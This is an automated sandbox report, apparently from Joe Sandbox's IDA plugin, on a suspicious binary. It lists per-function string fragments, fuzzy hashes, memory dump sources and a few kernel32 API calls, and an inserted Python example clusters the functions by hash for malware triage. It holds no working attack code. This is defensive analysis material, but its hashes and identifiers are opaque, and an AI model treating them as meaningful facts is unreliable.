                                                                  • String ID: #$3$5$6$6$7$>$>$B$H$J$]$`$a$a$a$a$a$a$a$a$agy$b$b$c$c$d$d$d$d$d$e$e$e$e$e$e$e$e$e$e$e$e$e$e$eroon$g$g$g$g$g$gibor$h$h$h$h$h$h$herej$i$i$i$i$i$i$irdor$k$k$l$l$l$l$l$l$lybor$m$m$m$n$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$o$o$o$o$p$p$q$r$r$r$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$t$t$t$t$u$w$w$w$y$z$z
                                                                  • API String ID: 0-226567699
                                                                  • Opcode ID: 5bf2394e186fa3740055896f63d422ae9df793a170122944e5eb4f5801406b64
                                                                  • Instruction ID: 897faa67981242d41c61dfb40b62df43763f7642aa4407e7da9ffeee02b4687e
                                                                  • Opcode Fuzzy Hash: 5bf2394e186fa3740055896f63d422ae9df793a170122944e5eb4f5801406b64
                                                                  • Instruction Fuzzy Hash: 36929F2400D7C189E332C72884587DFBFD25BA6718F488E9ED4ED1B292C6BA0159C767
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: #$5$6$6$7$>$>$B$J$]$`$a$a$a$a$a$a$a$a$agy$b$b$c$c$d$d$d$d$d$e$e$e$e$e$e$e$e$e$e$e$e$e$e$eroon$g$g$g$g$g$gibor$h$h$h$h$h$h$herej$i$i$i$i$i$i$irdor$k$k$l$l$l$l$l$l$lybor$m$m$m$n$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$o$o$o$o$p$p$q$r$r$r$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$t$t$t$t$u$w$w$w$y$z$z
                                                                  • API String ID: 0-1314068085
                                                                  • Opcode ID: 0d3d9c16a7e67113e3b9701a0b24be30b96c2e0d1d52f6ef8f0a9078a67e094f
                                                                  • Instruction ID: 9d4485feb2a8a036b1cfc007295b7909a2e3c490d21ab14ed2397911ff3ccdd3
                                                                  • Opcode Fuzzy Hash: 0d3d9c16a7e67113e3b9701a0b24be30b96c2e0d1d52f6ef8f0a9078a67e094f
                                                                  • Instruction Fuzzy Hash: 02829E2450D7C189E332C7288458BDFBFD25BE6718F488E9EC4DD1B292C6BA0259C767
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick
                                                                  • String ID: #$5$6$6$7$>$>$B$]$`$a$a$a$a$a$a$a$a$agy$b$b$c$c$d$d$d$d$d$e$e$e$e$e$e$e$e$e$e$e$e$e$e$eroon$g$g$g$g$g$gibor$h$h$h$h$h$h$herej$i$i$i$i$i$i$irdor$k$k$l$l$l$l$l$l$lybor$m$m$m$n$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$o$o$o$o$p$p$q$r$r$r$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$t$t$t$t$u$w$w$w$y$z$z
                                                                  • API String ID: 536389180-3007975938
                                                                  • Opcode ID: 8ee9640c17f91ccb7d287c1752a923c24f15c941b78ca902b81a0f24a1e0ded3
                                                                  • Instruction ID: 3eef77c2757c53a506e9ba4930021fd98a878e4b0ac0346694406f782fac75c3
                                                                  • Opcode Fuzzy Hash: 8ee9640c17f91ccb7d287c1752a923c24f15c941b78ca902b81a0f24a1e0ded3
                                                                  • Instruction Fuzzy Hash: AE729D2054D7C189E332C72884587DFBFD26BE6718F488E9ED4DD1B292C6BA0258C767
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: !$!$($,$,$3$6$<$@$A$A$B$C$I$Ljq$N$O$S$W$W$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$b$b$b$c$c$c$d$d$d$d$d$d$d$d$dualc$e$e$e$e$e$e$e$e$f$fna$g$g$h$h$hyb$i$i$i$j$j$j$j$l$l$l$l$lmada$m$m$n$n$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$q$r$r$r$r$r$r$rebyc$s$s$s$s$s$s$t$t$t$u$x$]$y$y$y
                                                                  • API String ID: 0-398216896
                                                                  • Opcode ID: 61968711493c94afcf7b2d208f4ce372754da47d982c7ba6b8816e6091b8bd33
                                                                  • Instruction ID: 783009e22913d8b145aff4382d8fc585394a81b2b82b9b90aaca791fecb38a32
                                                                  • Opcode Fuzzy Hash: 61968711493c94afcf7b2d208f4ce372754da47d982c7ba6b8816e6091b8bd33
                                                                  • Instruction Fuzzy Hash: 00A2CF2000D7C189E332C77894547DFBFD11BA6318F489E9ED4ED6A292C6BA0259CB77
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: !$!$($,$,$3$6$<$@$A$A$B$C$I$Ljq$N$O$S$W$W$a$a$a$a$a$a$a$a$a$a$b$c$c$d$d$d$dualc$e$e$e$e$f$fna$g$h$h$hyb$i$j$j$j$j$l$l$l$l$lmada$m$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$q$r$r$r$r$rebyc$s$s$s$s$s$s$t$t$u$x$]$y$y
                                                                  • API String ID: 0-1246891121
                                                                  • Opcode ID: 43c16ada332a8dd709468707ff4d6f0fce7f85d4f85c0fd8587031f39c8da794
                                                                  • Instruction ID: a28a096e937e9de4dcdb39462e473e9428d52a79a1e09a05438f9163ff59b36a
                                                                  • Opcode Fuzzy Hash: 43c16ada332a8dd709468707ff4d6f0fce7f85d4f85c0fd8587031f39c8da794
                                                                  • Instruction Fuzzy Hash: 0192C02400D7C18AE332CB7894547DFFFD15BA6318F489E9EC4ED6A292C6B60149CB67
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: "$$$'$*$8$>$D$E$I$b$b$b$c$d$d$f$g$g$h$h$h$h$h$h$i$i$l$l$m$m$m$m$n$o$o$o$p$p$p$p$q$r$s$s$s$s$s$s$t$t$t$t$t$t$t$t$u$v$w$z${
                                                                  • API String ID: 0-1889039134
                                                                  • Opcode ID: 8a5a3c4c6769900c5574127e7be7bd684675318f2718d754a9158b27d764485c
                                                                  • Instruction ID: d93a35099a26fe614cb1a3d73480c0d45d8b3759dc0d557f6e2bb2caa7de7eb8
                                                                  • Opcode Fuzzy Hash: 8a5a3c4c6769900c5574127e7be7bd684675318f2718d754a9158b27d764485c
                                                                  • Instruction Fuzzy Hash: 5C12E82540D7C1CDD322CB28945478FFFD15FA6618F489E9EE1E847392D2BA8209CB67
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $!$"$"$#$#$$$&$&$'$)$)$*$+$-$.$.$2$4$4$5$7$9$9$:$:$;$;$?$@$B$C$D$E$E$E$F$H$I$I$J$K$K$L$L$O$O$P$P$T$T$V$V$Z$Z$Z$[$[$\$]$^$^$_$_$`$c$d$d$d$d$g$h$i$j$l$n$o$p$r$s$t$t$u${${$}$}
                                                                  • API String ID: 0-3399755458
                                                                  • Opcode ID: bd7c04dccf065e1d88f6d9f7e92eaab3c2c44fac3a6ad3412f958f15279ef865
                                                                  • Instruction ID: 7bb5c3633d4d28a97bd5419e7888351cfa4f1d60291a9d888d1e89523d7a5470
                                                                  • Opcode Fuzzy Hash: bd7c04dccf065e1d88f6d9f7e92eaab3c2c44fac3a6ad3412f958f15279ef865
                                                                  • Instruction Fuzzy Hash: DDA2A13040C7C29AD336C63888587CBBFD46BA6324F588B9DD1ED4A2D2D675024AD767
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?,00000000), ref: 004164B1
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00000014), ref: 004164EB
                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000014), ref: 004164F2
                                                                  • lstrlenA.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00000014), ref: 0041654B
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004165E3
                                                                  • HeapFree.KERNEL32(00000000), ref: 004165EA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Processlstrlen$AllocFree
                                                                  • String ID: "$#$&$'$'$.$.$/$0$2$3$4$6$7$7$7$9$:$:$>$?$?$A$F$G$I$M$M$M$N$O$S$T$U$U$Y$\$\$]$]$^$a$a$b$c$c$d$d$f$g$h$i$k$l$n$n$n$p$p$s$v$z${${$|$~
                                                                  • API String ID: 2204526134-88862724
                                                                  • Opcode ID: 35d8601f16750b3f0a8b14371d56d770c5ec2ac2de7b2246bbd6a7e197c30585
                                                                  • Instruction ID: d3d8d2549f7682fd1551bd31a31a6895d5c84ed4d1ce20b04fc8ae49b41e83c9
                                                                  • Opcode Fuzzy Hash: 35d8601f16750b3f0a8b14371d56d770c5ec2ac2de7b2246bbd6a7e197c30585
                                                                  • Instruction Fuzzy Hash: D8622A2110D7C189D322CB3C985868FBFD51BA7218F585E9DF5E44B3E3C2AA8249C767
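                                                                  The Similarity fields above (Opcode ID, Instruction Fuzzy Hash, String ID) are emitted per function by the Joe Sandbox IDA Plugin, but the report does not relate the entries to each other. The following Python is an added example, not part of this report and not Joe Sandbox's own code: it parses those fields from the entry text, compares Instruction Fuzzy Hashes by nibble-wise Hamming distance to group near-identical functions (the first three entries above differ in 10 to 12 of 70 hex digits, the later ones in more than 30), and pulls the multi-character tokens such as eroon and gibor out of the $-delimited String ID field. The sample input is copied from the entries above. Assumptions: Joe Sandbox does not document the fuzzy-hash format, so treating aligned hex digits as comparable is a heuristic and the 14-digit threshold is arbitrary; a literal $ inside a string cannot be told apart from the delimiter.

```python
import re
from itertools import combinations

# Constructed sample: the String ID, Opcode ID and Instruction Fuzzy Hash
# fields of five function entries copied from the report (Joe Sandbox IDA
# Plugin output, snapshot hcaresult_0_2_400000_document.jbxd).
SAMPLE_REPORT = """\
• String ID: #$3$5$6$6$7$>$>$B$H$J$]$`$a$a$a$a$a$a$a$a$agy$b$b$c$c$d$d$d$d$d$e$e$e$e$e$e$e$e$e$e$e$e$e$e$eroon$g$g$g$g$g$gibor$h$h$h$h$h$h$herej$i$i$i$i$i$i$irdor$k$k$l$l$l$l$l$l$lybor$m$m$m$n$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$o$o$o$o$p$p$q$r$r$r$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$t$t$t$t$u$w$w$w$y$z$z
• Opcode ID: 5bf2394e186fa3740055896f63d422ae9df793a170122944e5eb4f5801406b64
• Instruction Fuzzy Hash: 36929F2400D7C189E332C72884587DFBFD25BA6718F488E9ED4ED1B292C6BA0159C767
• Opcode ID: 0d3d9c16a7e67113e3b9701a0b24be30b96c2e0d1d52f6ef8f0a9078a67e094f
• Instruction Fuzzy Hash: 02829E2450D7C189E332C7288458BDFBFD25BE6718F488E9EC4DD1B292C6BA0259C767
• Opcode ID: 8ee9640c17f91ccb7d287c1752a923c24f15c941b78ca902b81a0f24a1e0ded3
• Instruction Fuzzy Hash: AE729D2054D7C189E332C72884587DFBFD26BE6718F488E9ED4DD1B292C6BA0258C767
• Opcode ID: 8a5a3c4c6769900c5574127e7be7bd684675318f2718d754a9158b27d764485c
• Instruction Fuzzy Hash: 5C12E82540D7C1CDD322CB28945478FFFD15FA6618F489E9EE1E847392D2BA8209CB67
• Opcode ID: 35d8601f16750b3f0a8b14371d56d770c5ec2ac2de7b2246bbd6a7e197c30585
• Instruction Fuzzy Hash: D8622A2110D7C189D322CB3C985868FBFD51BA7218F585E9DF5E44B3E3C2AA8249C767
"""

# One "key: value" bullet per line; the key is everything before the first colon.
FIELD_RE = re.compile(r"^\s*•?\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)\s*$")


def parse_entries(text):
    """Return one dict per function entry. In the report each entry's last
    Similarity field is 'Instruction Fuzzy Hash', so that key closes an entry."""
    entries, cur = [], {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, val = m.group("key"), m.group("val")
        cur[key] = val
        if key == "Instruction Fuzzy Hash":
            entries.append(cur)
            cur = {}
    return entries


def nibble_distance(a, b):
    """Hamming distance over hex digits. Assumption: the two hashes are the same
    length and aligned digits are comparable; the hash format is undocumented."""
    if len(a) != len(b):
        raise ValueError("fuzzy hashes must be the same length")
    return sum(x != y for x, y in zip(a.upper(), b.upper()))


def cluster_by_fuzzy_hash(entries, max_distance):
    """Single-linkage clustering with union-find: two entries are joined when
    their Instruction Fuzzy Hashes differ in at most max_distance digits.
    Returns lists of Opcode IDs, largest group first."""
    parent = list(range(len(entries)))

    def find(i):
        while parent[i] != i:
            parent[i] = parent[parent[i]]
            i = parent[i]
        return i

    for i, j in combinations(range(len(entries)), 2):
        d = nibble_distance(entries[i]["Instruction Fuzzy Hash"],
                            entries[j]["Instruction Fuzzy Hash"])
        if d <= max_distance:
            parent[find(i)] = find(j)
    groups = {}
    for i, e in enumerate(entries):
        groups.setdefault(find(i), []).append(e["Opcode ID"])
    return sorted(groups.values(), key=len, reverse=True)


def long_tokens(string_id, min_len=3):
    """Split the '$'-delimited String ID field and keep tokens of min_len or
    more characters (the single letters are noise for triage). A literal '$'
    inside a string is indistinguishable from the delimiter in this format."""
    return [t for t in string_id.split("$") if len(t) >= min_len]


if __name__ == "__main__":
    ents = parse_entries(SAMPLE_REPORT)
    for grp in cluster_by_fuzzy_hash(ents, max_distance=14):
        print(len(grp), "function(s):", [o[:12] for o in grp])
    print(long_tokens(ents[0]["String ID"]))
```

With the 14-digit threshold the first three entries land in one group and the remaining two stay apart, which matches what a reader sees by eye in the hashes: the same code body re-emitted with small differences, consistent with the report's other observations of repeated junk or obfuscation code.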
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: !$!$($,$,$3$6$<$A$B$C$I$Ljq$O$S$a$a$a$a$a$a$a$a$a$a$b$c$c$d$d$d$dualc$e$e$e$f$fna$g$h$h$hyb$i$j$j$j$l$l$l$lmada$m$n$n$n$n$n$n$n$n$n$o$o$o$o$q$r$r$r$r$rebyc$s$s$s$s$t$t$u$x$]$y
                                                                  • API String ID: 0-3286634472
                                                                  • Opcode ID: bd6bb27d60141563e35dc989fdf8730712766b0b72a44616c1c7e8647056d585
                                                                  • Instruction ID: 214f063a2eaa7479a4200d3698902748cf37a85b794205f16bdb65cf0bbf3bb2
                                                                  • Opcode Fuzzy Hash: bd6bb27d60141563e35dc989fdf8730712766b0b72a44616c1c7e8647056d585
                                                                  • Instruction Fuzzy Hash: C862AF2400D7C18AE332CB7894547DFFFD15BA6308F089EAED4DD6A292C6B60159CB67
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $!$"$"$#$$$&$&$'$)$*$+$-$.$.$2$4$5$7$9$9$:$:$;$;$?$@$B$C$D$E$E$E$F$H$I$I$J$K$L$L$O$O$P$P$T$V$V$Z$[$\$]$^$^$_$_$`$c$d$d$d$d$g$h$j$l$o$p$r$s$t$u${${$}$}
                                                                  • API String ID: 0-3967217698
                                                                  • Opcode ID: ffa1e3fc69652a11b1a6c6df878d9b27e8738cfaffb22d8a44fe04aed7599e5e
                                                                  • Instruction ID: c25c44ad86f806f1bc6481ccfacf67464102ede46037e78e9a54b81988712fa8
                                                                  • Opcode Fuzzy Hash: ffa1e3fc69652a11b1a6c6df878d9b27e8738cfaffb22d8a44fe04aed7599e5e
                                                                  • Instruction Fuzzy Hash: 6A82A03040C7C29AD376CA3884487CBBFD56BE6324F488B9DD1ED4A2D2DA75024AD767
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $&$($2$3$4$<$H$K$N$R$U$V$W$]$_$a$a$a$b$bewrd$d$d$d$d$d$e$e$e$edippugvawpubewrd$f$g$g$i$j$j$k$k$l$m$m$m$n$n$o$p$p$p$r$r$r$u$u$v$v$v$v$w$w$|$}
                                                                  • API String ID: 0-3024838208
